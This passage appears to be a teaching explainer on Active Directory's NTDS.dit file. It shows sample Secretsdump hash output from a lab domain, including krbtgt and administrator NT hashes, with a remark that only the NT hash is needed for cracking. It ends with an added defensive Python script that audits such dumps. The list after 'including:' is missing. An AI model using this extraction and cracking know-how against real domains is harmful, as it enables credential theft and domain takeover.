The NTDS.dit file is a database used by Active Directory (AD) to store critical information, including:
Extracting this database allows attackers or security professionals to analyze and potentially crack passwords to assess an organization’s security posture.
Below is example Secretsdump output from a compromised Domain Admin account:
Username:RID:LM_HASH:NT_HASH:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:920ae267e048417fcfe00f49ecbd4b33:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:e5efba889e477a42ce92a08a552388d6:::
MARVEL.local\tstark:1103:aad3b435b51404eeaad3b435b51404ee:1bc3af33d22c1c2baec10a32db22c72d:::
MARVEL.local\SQLService:1104:aad3b435b51404eeaad3b435b51404ee:f4ab68f27303bcb4024650d8fc5f973a:::
MARVEL.local\fcastle:1105:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
MARVEL.local\pparker:1107:aad3b435b51404eeaad3b435b51404ee:c39f2beb3d2ec06a62cb887fb391dee0:::
QbBviUCMbV:1110:aad3b435b51404eeaad3b435b51404ee:afc24896d6b14b775a7ba303a9ba4475:::
TqiHKXoSxD:1111:aad3b435b51404eeaad3b435b51404ee:880c15fce05500278cc9d7874ef61ea7:::
hawkeye:1112:aad3b435b51404eeaad3b435b51404ee:43460d636f269c709b20049cee36ae7a:::
HYDRA-DC$:1000:aad3b435b51404eeaad3b435b51404ee:478d9af989f39c84cafcd6b4cb4d87dd:::
THEPUNISHER$:1108:aad3b435b51404eeaad3b435b51404ee:45195d442d68be340536990a8d50c363:::
SPIDERMAN$:1109:aad3b435b51404eeaad3b435b51404ee:96afa04a09388ec38a26ab520ff5e717:::
Each entry follows the format:
Username:RID:LM_HASH:NT_HASH:::
✅ The LM hash is aad3b435b51404eeaad3b435b51404ee, indicating it’s disabled (modern Windows systems disable LM hashing).
✅ Only the NT hash is needed for password cracking.
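
As an added example (not from the original page), the Python below parses entries in the Username:RID:LM_HASH:NT_HASH::: format described above and reports what a defender would triage after an authorized dump: accounts that still store an LM hash, empty passwords, NT hashes shared between users, and machine accounts. The sample lines, the EXAMPLE.local domain and the function names are constructed for illustration.

```python
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of an empty string (LM storage disabled)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty password

# Constructed sample lines: placeholder hashes, hypothetical EXAMPLE.local domain.
SAMPLE = r"""Username:RID:LM_HASH:NT_HASH:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
EXAMPLE.local\alice:1103:aad3b435b51404eeaad3b435b51404ee:22222222222222222222222222222222:::
EXAMPLE.local\bob:1104:aad3b435b51404eeaad3b435b51404ee:22222222222222222222222222222222:::
EXAMPLE.local\legacy:1105:33333333333333333333333333333333:44444444444444444444444444444444:::
WS01$:1106:aad3b435b51404eeaad3b435b51404ee:55555555555555555555555555555555:::
"""

# Optional DOMAIN\ prefix, then user, numeric RID, and two 32-hex-digit hashes.
ENTRY = re.compile(
    r"^(?:(?P<domain>[^\\:]+)\\)?(?P<user>[^\\:]+):(?P<rid>\d+):"
    r"(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)

def parse_line(line):
    """Parse one entry; return None for headers, blanks and malformed lines."""
    m = ENTRY.match(line.strip())
    if not m:
        return None
    e = m.groupdict()
    e.update(rid=int(e["rid"]), lm=e["lm"].lower(), nt=e["nt"].lower(),
             machine=e["user"].endswith("$"))  # machine accounts end in "$"
    return e

def audit(lines):
    """Summarise hygiene findings; account names only, hashes are never echoed."""
    entries = [e for e in map(parse_line, lines) if e]
    by_nt = defaultdict(list)
    for e in entries:
        if not e["machine"] and e["nt"] != EMPTY_NT:
            by_nt[e["nt"]].append(e["user"])
    return {
        "lm_stored": [e["user"] for e in entries if e["lm"] != EMPTY_LM],
        "empty_password": [e["user"] for e in entries if e["nt"] == EMPTY_NT],
        "shared_password": sorted(sorted(u) for u in by_nt.values() if len(u) > 1),
        "machine_accounts": [e["user"] for e in entries if e["machine"]],
    }

if __name__ == "__main__":
    for finding, accounts in audit(SAMPLE.splitlines()).items():
        print(f"{finding}: {accounts}")
```

An empty-password finding still needs a check of whether the account is enabled, which this output format does not show.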